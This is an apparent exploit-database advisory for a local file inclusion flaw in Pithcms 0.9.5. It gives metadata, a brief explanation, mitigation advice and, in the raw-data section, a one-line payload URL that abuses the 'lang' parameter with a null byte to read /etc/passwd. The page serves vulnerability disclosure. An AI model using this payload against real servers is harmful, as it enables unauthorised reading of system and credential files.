header-logo
Suggest Exploit
vendor:
Pithcms
by:
sh00t0ut
9,3
CVSS
HIGH
Local Include Exploit
98
CWE
Product Name: Pithcms
Affected Version From: 0.9.5
Affected Version To: 0.9.5
Patch Exists: NO
Related CWE: N/A
CPE: a:pithcms:pithcms:0.9.5
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Pithcms 0.9.5 Local Include Exploit

Pithcms 0.9.5 is vulnerable to a local include exploit. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server, containing an arbitrary file path in the 'lang' parameter. This will allow the attacker to read the contents of the file, such as the /etc/passwd file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not vulnerable to local file inclusion attacks. This can be done by validating user input and ensuring that only trusted files are included in the application.
Source

Exploit-DB raw data:

[~] Pithcms 0.9.5 Local Include ExploitPithcms 0.9.5 Local Include Exploit
[~] Found by sh00t0ut
[~] Expl: http://[victim]/oldnews_reader.php?lang=[etc/passwd]%00

Navigation

Suggest Exploit

Services By CQR